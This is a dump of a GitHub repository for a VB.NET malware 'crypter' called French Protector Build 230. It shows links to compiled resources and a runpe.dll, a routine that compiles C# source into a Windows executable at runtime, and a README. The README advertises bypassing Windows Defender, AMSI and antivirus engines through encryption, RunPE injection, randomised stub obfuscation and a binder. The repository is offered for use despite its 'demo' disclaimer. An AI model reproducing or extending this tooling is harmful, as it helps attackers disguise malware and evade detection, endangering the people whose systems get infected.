https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French_Protector_Build_230.Form1.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French_Protector_Build_230.IconChanger.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French_Protector_Build_230.IconChanger.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French_Protector_Build_230.License.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French_Protector_Build_230.License.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French_Protector_Build_230.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French_Protector_Build_230.Resources.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French_Protector_Build_230.compress.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French_Protector_Build_230.compress.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French_Protector_Build_230.download.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French_Protector_Build_230.download.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/TempPE/My Project.Resources.Designer.vb.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/TempPE/My Project.Resources.Designer.vb.dll -------------------------------------------------------------------------------- /French Protector Build 230/zarritem.vb: -------------------------------------------------------------------------------- 1 | Imports System 2 | Imports System.CodeDom.Compiler 3 | Imports System.Collections 4 | Imports System.Collections.Generic 5 | Imports System.Runtime.CompilerServices 6 | Imports Microsoft.CSharp 7 | Imports Microsoft.VisualBasic 8 | Imports Microsoft.VisualBasic.CompilerServices 9 | 10 | Namespace Zarrme 11 | ' Token: 0x0200000F RID: 15 12 | Public Class Varrme 13 | ' Token: 0x06000079 RID: 121 RVA: 0x00004008 File Offset: 0x00002208 14 | Public Shared Sub build(Path As String, Code As String, MainClass As String) 15 | Dim csharpCodeProvider As CSharpCodeProvider = New CSharpCodeProvider(New Dictionary(Of String, String)() From {{"CompilerVersion", "v4.0"}}) 16 | Dim compilerParameters As CompilerParameters = New CompilerParameters() 17 | Dim compilerParameters2 As CompilerParameters = compilerParameters 18 | compilerParameters2.GenerateExecutable = True 19 | compilerParameters2.OutputAssembly = Path 20 | Dim compilerParameters3 As CompilerParameters = compilerParameters2 21 | Dim compilerParameters4 As CompilerParameters = compilerParameters3 22 | compilerParameters3.CompilerOptions = compilerParameters4.CompilerOptions + "/platform:X86 /target:winexe" 23 | compilerParameters2.MainClass = MainClass 24 | compilerParameters2.IncludeDebugInformation = True 25 | compilerParameters2.ReferencedAssemblies.Add("System.Core.dll") 26 | compilerParameters2.ReferencedAssemblies.Add("System.Data.dll") 27 | compilerParameters2.ReferencedAssemblies.Add("System.Data.DataSetExtensions.dll") 28 | compilerParameters2.ReferencedAssemblies.Add("System.Deployment.dll") 29 | compilerParameters2.ReferencedAssemblies.Add("Microsoft.CSharp.dll") 30 | compilerParameters2.ReferencedAssemblies.Add("System.dll") 31 | compilerParameters2.ReferencedAssemblies.Add("System.Windows.Forms.dll") 32 | compilerParameters2.ReferencedAssemblies.Add("System.Drawing.dll") 33 | Dim compilerResults As CompilerResults = csharpCodeProvider.CompileAssemblyFromSource(compilerParameters, New String() {Code}) 34 | If compilerResults.Errors.Count > 0 Then 35 | Try 36 | For Each obj As Object In compilerResults.Errors 37 | Dim objectValue As Object = RuntimeHelpers.GetObjectValue(obj) 38 | Interaction.MsgBox(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, Nothing, "ErrorText", New Object(-1) {}, Nothing, Nothing, Nothing)), MsgBoxStyle.OkOnly, Nothing) 39 | Next 40 | Finally 41 | Dim enumerator As IEnumerator 42 | If TypeOf enumerator Is IDisposable Then 43 | TryCast(enumerator, IDisposable).Dispose() 44 | End If 45 | End Try 46 | End If 47 | End Sub 48 | 49 | ' Token: 0x0600007A RID: 122 RVA: 0x00002305 File Offset: 0x00000505 50 | Friend Shared Sub m11WrQjSbQd1BM1A6sW() 51 | End Sub 52 | 53 | ' Token: 0x0600007B RID: 123 RVA: 0x000025DA File Offset: 0x000007DA 54 | 55 | End Class 56 | End Namespace 57 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # French Crypt 2 | ### VB.NET Powerfull Crypter Bypasses WD 3 | 4 | ## Authors 5 | AAR ~ FiveSeven 6 | 7 | 8 | ![Untitled](https://github.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/assets/86024483/150b3116-555e-416c-b0b8-b8bd30ee2c64) 9 | 10 | 11 | 12 | ## Note 13 | 14 | Don't be a script kiddie, I made this in Old years so you can make your own modifications. This tool is intended as a demo for how easy it is to write your own crypter. It works for its intended purpose and I will not patch it to make it suitable for yours. 15 | 16 | 17 | ## Features 18 | FrenchCrypt: 19 | * Bypasses AMSI and all modern AVs in use on VirusTotal (as of writing) 20 | * Compresses and encrypts 21 | * uses Runpe 22 | * Randomizes variable names to further obfuscate the decrypter stub 23 | * Randomizes encryption, compression and even the order that the statements appear in the code for maximum entropy! 24 | * Super easy to modify to create your own crypter variant 25 | * Binder 26 | * All features in a single file so you can take it with you anywhere! 27 | * Is despite all of the above not a silver bullet for every configuration -- caveat emptor! 28 | 29 | ## Usage 30 | ``` 31 | Build The Project, Go To Releases Folder. 32 | ``` 33 | -------------------------------------------------------------------------------- /runpe.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/runpe.dll --------------------------------------------------------------------------------